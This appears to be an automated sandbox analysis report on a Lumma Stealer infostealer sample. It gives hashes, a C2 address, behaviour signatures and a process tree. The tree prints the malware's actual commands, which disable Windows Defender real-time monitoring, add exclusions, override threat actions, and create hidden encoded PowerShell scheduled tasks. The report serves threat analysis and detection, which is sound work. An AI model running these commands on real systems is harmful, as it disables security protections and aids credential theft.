Resubmissions

04/10/2024, 00:45

241004-a36h7avgkl 10

03/10/2024, 22:30

241003-2eyl8azfqj 6

Analysis

  • max time kernel
    148s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    04/10/2024, 00:45

General

  • Target

    04cd12393aa1e04aaca2f1f05a0da8ea1b0003a01a66dfc863991034f836f45a.exe

  • Size

    1.9MB

  • MD5

    a00b2cfa83db42323e19d954710c74e1

  • SHA1

    d24e3546f6b758d64c86e7ac48f422ed97ea729a

  • SHA256

    04cd12393aa1e04aaca2f1f05a0da8ea1b0003a01a66dfc863991034f836f45a

  • SHA512

    cd3d85d24ef07771df20218e7e8743777156151436e58c029a3c89f804c3bbb477dc18fed67f1f5e97d3c5c31522fb673a1a109e47859f683ed7cc600067ec6a

  • SSDEEP

    49152:qvnMlvvvqFI3rUUan7yeCz3i96K0nLAcR3YmPXHXcK:64vWI3rJa7yeCzjDnUcRImPXHr

Malware Config

Extracted

Family

lumma

C2

https://beearvagueo.site/api

Signatures

  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 11 IoCs
  • Indirect Command Execution 1 TTPs 12 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 34 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 10 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 11 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 18 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 39 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\04cd12393aa1e04aaca2f1f05a0da8ea1b0003a01a66dfc863991034f836f45a.exe
    "C:\Users\Admin\AppData\Local\Temp\04cd12393aa1e04aaca2f1f05a0da8ea1b0003a01a66dfc863991034f836f45a.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2172
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      2⤵
      • Checks computer location settings
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:548
      • C:\Users\Admin\Documents\iofolko5\HLRTzezunT2Ovldb8V_kvkmU.exe
        C:\Users\Admin\Documents\iofolko5\HLRTzezunT2Ovldb8V_kvkmU.exe
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2228
        • C:\Users\Admin\AppData\Local\Temp\7zS277E.tmp\Install.exe
          .\Install.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1664
          • C:\Users\Admin\AppData\Local\Temp\7zS2C9C.tmp\Install.exe
            .\Install.exe /JgvdidbZmp "385121" /S
            5⤵
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Enumerates system info in registry
            • Suspicious use of WriteProcessMemory
            PID:2312
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2220
              • C:\Windows\SysWOW64\forfiles.exe
                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                7⤵
                • Indirect Command Execution
                • Suspicious use of WriteProcessMemory
                PID:912
                • C:\Windows\SysWOW64\cmd.exe
                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:1004
                  • \??\c:\windows\SysWOW64\reg.exe
                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                    9⤵
                      PID:1944
                • C:\Windows\SysWOW64\forfiles.exe
                  forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                  7⤵
                  • Indirect Command Execution
                  • System Location Discovery: System Language Discovery
                  PID:1568
                  • C:\Windows\SysWOW64\cmd.exe
                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                    8⤵
                      PID:1828
                      • \??\c:\windows\SysWOW64\reg.exe
                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                        9⤵
                          PID:1112
                    • C:\Windows\SysWOW64\forfiles.exe
                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                      7⤵
                      • Indirect Command Execution
                      PID:2480
                      • C:\Windows\SysWOW64\cmd.exe
                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                        8⤵
                        • System Location Discovery: System Language Discovery
                        PID:2184
                        • \??\c:\windows\SysWOW64\reg.exe
                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                          9⤵
                          • System Location Discovery: System Language Discovery
                          PID:2988
                    • C:\Windows\SysWOW64\forfiles.exe
                      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                      7⤵
                      • Indirect Command Execution
                      PID:1780
                      • C:\Windows\SysWOW64\cmd.exe
                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                        8⤵
                          PID:2492
                          • \??\c:\windows\SysWOW64\reg.exe
                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                            9⤵
                            • System Location Discovery: System Language Discovery
                            PID:1500
                      • C:\Windows\SysWOW64\forfiles.exe
                        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                        7⤵
                        • Indirect Command Execution
                        • System Location Discovery: System Language Discovery
                        PID:328
                        • C:\Windows\SysWOW64\cmd.exe
                          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                          8⤵
                            PID:2980
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                              9⤵
                              • Command and Scripting Interpreter: PowerShell
                              • Drops file in System32 directory
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3064
                              • C:\Windows\SysWOW64\gpupdate.exe
                                "C:\Windows\system32\gpupdate.exe" /force
                                10⤵
                                  PID:2952
                        • C:\Windows\SysWOW64\forfiles.exe
                          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                          6⤵
                          • Indirect Command Execution
                          PID:2404
                          • C:\Windows\SysWOW64\cmd.exe
                            /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                            7⤵
                              PID:2416
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                8⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Drops file in System32 directory
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2544
                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                  9⤵
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2080
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /CREATE /TN "bPUtwrklxNafuwbpPq" /SC once /ST 00:47:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ISLwUKPJvjhlTXkiU\sHoVhEivufNzyEd\TcPDtnB.exe\" 0H /qdidn 385121 /S" /V1 /F
                            6⤵
                            • Drops file in Windows directory
                            • Scheduled Task/Job: Scheduled Task
                            PID:2604
                    • C:\Users\Admin\Documents\iofolko5\lk9Ldxrg3RRzMhQo5WbjR_Uy.exe
                      C:\Users\Admin\Documents\iofolko5\lk9Ldxrg3RRzMhQo5WbjR_Uy.exe
                      3⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:780
                      • C:\Users\Admin\Documents\iofolko5\ccGDScQhwtMv7tbRf1m2JKtr.exe
                        C:\Users\Admin\Documents\iofolko5\ccGDScQhwtMv7tbRf1m2JKtr.exe
                        4⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • System Location Discovery: System Language Discovery
                        PID:2932
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                          5⤵
                          • Loads dropped DLL
                          • Checks processor information in registry
                          • Suspicious behavior: EnumeratesProcesses
                          PID:1992
                          • C:\ProgramData\EBAFBGIDHC.exe
                            "C:\ProgramData\EBAFBGIDHC.exe"
                            6⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:568
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                              7⤵
                              • System Location Discovery: System Language Discovery
                              PID:1640
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 568 -s 92
                              7⤵
                              • Loads dropped DLL
                              • Program crash
                              PID:2732
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\AKEBFCFIJJKK" & exit
                            6⤵
                              PID:1632
                              • C:\Windows\SysWOW64\timeout.exe
                                timeout /t 10
                                7⤵
                                • Delays execution with timeout.exe
                                PID:1396
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 2932 -s 92
                            5⤵
                            • Loads dropped DLL
                            • Program crash
                            PID:1384
                      • C:\Users\Admin\Documents\iofolko5\1TcV9bBuQfLHLuk8CggizKpL.exe
                        C:\Users\Admin\Documents\iofolko5\1TcV9bBuQfLHLuk8CggizKpL.exe
                        3⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • System Location Discovery: System Language Discovery
                        PID:1480
                      • C:\Users\Admin\Documents\iofolko5\NBgv1H4QcTrdOqAY8RuX3Rzz.exe
                        C:\Users\Admin\Documents\iofolko5\NBgv1H4QcTrdOqAY8RuX3Rzz.exe
                        3⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • System Location Discovery: System Language Discovery
                        • Checks processor information in registry
                        PID:1816
                        • C:\Users\Admin\AppData\Local\Temp\service123.exe
                          "C:\Users\Admin\AppData\Local\Temp\service123.exe"
                          4⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          PID:912
                        • C:\Windows\SysWOW64\schtasks.exe
                          "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
                          4⤵
                          • Scheduled Task/Job: Scheduled Task
                          PID:2616
                  • C:\Windows\system32\taskeng.exe
                    taskeng.exe {B62C6EA3-F399-4CB5-AE36-8C8696B46C4C} S-1-5-21-2703099537-420551529-3771253338-1000:XECUDNCD\Admin:Interactive:[1]
                    1⤵
                      PID:2436
                      • C:\Users\Admin\AppData\Local\Temp\service123.exe
                        C:\Users\Admin\AppData\Local\Temp\/service123.exe
                        2⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        PID:2720
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                        2⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:932
                        • C:\Windows\system32\gpupdate.exe
                          "C:\Windows\system32\gpupdate.exe" /force
                          3⤵
                            PID:1312
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                          2⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Drops file in System32 directory
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3032
                          • C:\Windows\system32\gpupdate.exe
                            "C:\Windows\system32\gpupdate.exe" /force
                            3⤵
                              PID:1964
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                            2⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Drops file in System32 directory
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1804
                            • C:\Windows\system32\gpupdate.exe
                              "C:\Windows\system32\gpupdate.exe" /force
                              3⤵
                                PID:1940
                          • C:\Windows\system32\taskeng.exe
                            taskeng.exe {A0523154-D89A-4175-9B8D-5A5F946E6A14} S-1-5-18:NT AUTHORITY\System:Service:
                            1⤵
                              PID:2656
                              • C:\Users\Admin\AppData\Local\Temp\ISLwUKPJvjhlTXkiU\sHoVhEivufNzyEd\TcPDtnB.exe
                                C:\Users\Admin\AppData\Local\Temp\ISLwUKPJvjhlTXkiU\sHoVhEivufNzyEd\TcPDtnB.exe 0H /qdidn 385121 /S
                                2⤵
                                • Executes dropped EXE
                                • Drops file in System32 directory
                                • Modifies data under HKEY_USERS
                                PID:816
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2512
                                  • C:\Windows\SysWOW64\forfiles.exe
                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                    4⤵
                                    • Indirect Command Execution
                                    PID:2376
                                    • C:\Windows\SysWOW64\cmd.exe
                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                      5⤵
                                        PID:1728
                                        • \??\c:\windows\SysWOW64\reg.exe
                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                          6⤵
                                            PID:1804
                                      • C:\Windows\SysWOW64\forfiles.exe
                                        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                        4⤵
                                        • Indirect Command Execution
                                        • System Location Discovery: System Language Discovery
                                        PID:2984
                                        • C:\Windows\SysWOW64\cmd.exe
                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                          5⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:2940
                                          • \??\c:\windows\SysWOW64\reg.exe
                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                            6⤵
                                              PID:2996
                                        • C:\Windows\SysWOW64\forfiles.exe
                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                          4⤵
                                          • Indirect Command Execution
                                          • System Location Discovery: System Language Discovery
                                          PID:2184
                                          • C:\Windows\SysWOW64\cmd.exe
                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                            5⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:2480
                                            • \??\c:\windows\SysWOW64\reg.exe
                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                              6⤵
                                                PID:2000
                                          • C:\Windows\SysWOW64\forfiles.exe
                                            forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                            4⤵
                                            • Indirect Command Execution
                                            PID:1940
                                            • C:\Windows\SysWOW64\cmd.exe
                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                              5⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:3000
                                              • \??\c:\windows\SysWOW64\reg.exe
                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                6⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:1204
                                          • C:\Windows\SysWOW64\forfiles.exe
                                            forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                            4⤵
                                            • Indirect Command Execution
                                            PID:2072
                                            • C:\Windows\SysWOW64\cmd.exe
                                              /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                              5⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:2692
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                6⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                • Drops file in System32 directory
                                                • Modifies data under HKEY_USERS
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2064
                                                • C:\Windows\SysWOW64\gpupdate.exe
                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                  7⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1216
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /CREATE /TN "gDOmkEAdI" /SC once /ST 00:21:45 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                          3⤵
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2160
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /run /I /tn "gDOmkEAdI"
                                          3⤵
                                            PID:888
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /DELETE /F /TN "gDOmkEAdI"
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:2812
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                            3⤵
                                              PID:2464
                                              • C:\Windows\SysWOW64\reg.exe
                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                4⤵
                                                • Modifies Windows Defender Real-time Protection settings
                                                • System Location Discovery: System Language Discovery
                                                PID:2080
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                              3⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:2548
                                              • C:\Windows\SysWOW64\reg.exe
                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                4⤵
                                                • Modifies Windows Defender Real-time Protection settings
                                                PID:1516
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              schtasks /CREATE /TN "guOfrMzuU" /SC once /ST 00:19:40 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                              3⤵
                                              • System Location Discovery: System Language Discovery
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:2624
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              schtasks /run /I /tn "guOfrMzuU"
                                              3⤵
                                                PID:2060
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                schtasks /DELETE /F /TN "guOfrMzuU"
                                                3⤵
                                                  PID:1700
                                                • C:\Windows\SysWOW64\forfiles.exe
                                                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                                                  3⤵
                                                  • Indirect Command Execution
                                                  PID:1104
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:2308
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                      5⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Drops file in System32 directory
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2332
                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                        6⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2288
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ujfGTnqxDJAJlXPO" /t REG_DWORD /d 0 /reg:32
                                                  3⤵
                                                    PID:2112
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ujfGTnqxDJAJlXPO" /t REG_DWORD /d 0 /reg:32
                                                      4⤵
                                                      • Windows security bypass
                                                      • System Location Discovery: System Language Discovery
                                                      PID:484
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ujfGTnqxDJAJlXPO" /t REG_DWORD /d 0 /reg:64
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:576
